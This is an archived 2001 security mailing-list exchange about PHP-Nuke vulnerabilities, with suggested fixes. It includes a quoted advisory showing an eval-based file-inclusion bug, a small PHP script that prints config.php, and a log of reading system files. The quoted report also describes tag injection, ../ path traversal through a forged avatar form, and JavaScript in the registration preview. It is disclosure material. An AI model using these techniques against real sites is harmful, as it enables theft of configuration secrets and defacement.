Re: SERIOUS BUG IN PHPNUKE

[supergate () twlc net]

i dont find it a serious bug... they can just ruin their details page... so
who cares...however if u want a serious bug of php nuke... well there is one
that allows to read any file on the sytem look at:

http://www.twlc.net/article.php?sid=318

Mauro.
admin of twlc dot net

      bug in nuke addon@#! DANGEROUS++!!!
      Posted on Friday, July 13 @ 19:53:31 CDT
      topic: advisories
      Evening everyone..
      Sorry to tell you: php nuke addon is BUGGY. it got a *HUGE* bug that
allows reading of every file on the system. let me explain you the bug...

      To do active forums and shit like that the author had to put:

      echo "<tr valign="top"><td bgcolor="#ffffff"> ";
      if (file_exists($content)) {
      $fp = fopen ($content, "r");
      $content = fread($fp, filesize($content));
      fclose ($fp);
      $content = "?>$content<?";
      echo eval($content);
      } else {
      echo $content;
      }
      echo "</td></tr></table> ";

      replacing

      ."<tr valign="top"><td bgcolor="#ffffff"> "
      ."$content "
      ."</td></tr></table> "

      ON EACH THEME file... so what this code does? it check the content of
the block and if this is a file it 'executes' it ... now i was like 'and if
i put something like this'

      <?php
      $db = "config.php";
      $fdb = @file($db);
      $ldb = count($fdb);
      while ($ldb>=0){
      echo $fdb [$ldb];
      $ldb--;
      };
      ?>
      (sorry for the code, but i am not a php guru:P)
      and name it to exploit.php and put it in the main directory? it simply
allowed me to read config.php but a friend of mine (shockzor THANK YOU BRO)
told me "who could put a file like that on ur webserver" (i didnt made the
test to upload it on my anonymous ftp but i think it could work:)) but thats
just a possibility that this routine gives to you cus i went ahead doing
these tests and and i found that this SIMPLY ALLOWS ANY FILE READING ON THE
SYSTEM LOOK:

      (sg|code) u got autoexec.bat under c: ?
      (shockzor) no
      (shockzor) autoexec.nt
      (sg|code) good
      (sg|code) Menu for shit
      <sg|code>
      (sg|code) lh %SystemRoot%system32mscdexnt.exe lh %SystemRoot%system32
edir lh %SystemRoot%system32dosx
      (sg|code) now
      (sg|code) since i am
      (sg|code) 31337
      (sg|code) WHAT?
      (sg|code) EHEH
      (shockzor) i dont think you can get out of the www root
      (sg|code) u think wrong
      (sg|code) cus i just did

      well u got to fixes:

      1) bring back your themes file to:

      ."<tr valign="top"><td bgcolor="#ffffff"> "
      ."$content "
      ."</td></tr></table> "

      2) get user.php go at the end of the file where there is:
      switch($op) {

      look down since you find

      case "edithome":
      edithome();
      break;

      case "savehome":
      savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock);
      break;

      remove this shit so users cant create their "home menu"

      thanks for the attention.

      btw i would like to thank shockzor that helped me making the tests!
thanks bro..!:D thanks also goes out to all in #twlc on undernet

      peace out

      (thanks goes out also to the authors of php nuke and php nuke addon, i
run em and i like em a lot ! keep up the good work)

      Mauro
      aka supergate
      root () twlc net
      http://www.twlc.net

      the following text has been posted to
      http://www.twlc.net
      http://www.phpnuke.org
      http://www.nukeaddon.com




----- Original Message -----
From: "MegaHz" <costcon () cytanet com cy>
To: <VULN-DEV () securityfocus com>; <INCIDENTS () securityfocus com>;
<bugtraq () securityfocus com>
Cc: <mc2 () securitywire com>
Sent: Friday, July 27, 2001 4:41 PM
Subject: SERIOUS BUG IN PHPNUKE



> Yes, phpnuke.org, was contacted....
>
> First take a look at:
> http://phpnuke.org/user.php?op=userinfo&uname=MegaHz
>
>
> Then, read this.................
> PHPnuke Bugs.
>
> After testing just a few scripts on phpnuke I have noticed the following:
>
> Some fields in the registration form allow  code
> and fail to filter out the tags.
> e.g Interests:  src=http://www.anything.com/defaced.gif>
>
> Also when faking a form and posting from local file (user.php.html)
> after editing a few fields like the avatar picture for example,
> it is possible to escape surtain dirs with the ../../../../dir/pic.gif
> in the options field.
>
> (-- This is a local html file and set to post to user.php on the target
> server --)
>   (no this is not a tag :P )
>
>
> 001.gif
> 002.gif
>
>
>
> This tells user.php to save the avatar path as
> http://www.target.com/../../../dir_on_server/anyfile.ext and loads the
file
> when the user info of the attacker is viewed.
>
> As we know webbugs (invisible or visible pics can be used for tracing)
>
> The preview of the Registration Form allows Javascript in the
> body. (not the user.php) but it does not allow ' or " . BUT you can user /
> instead of '
> so this helps to will in variables in javascript.
>
> This can damage the site and make it look ugly.
>
> I coulnt be bothered to look at the rest of phpnuke...
>
>
> Tested on phpnuke v5.0
>
> Firstly discovered by: dinopio
>
>
>
> =================================================
> Andreas Constantinides (MegaHz)
> Owner - Admin of cHp - http://www.cyhackportal.com
> megahz () cyhackportal com
> ICQ#: 30136845
> =================================================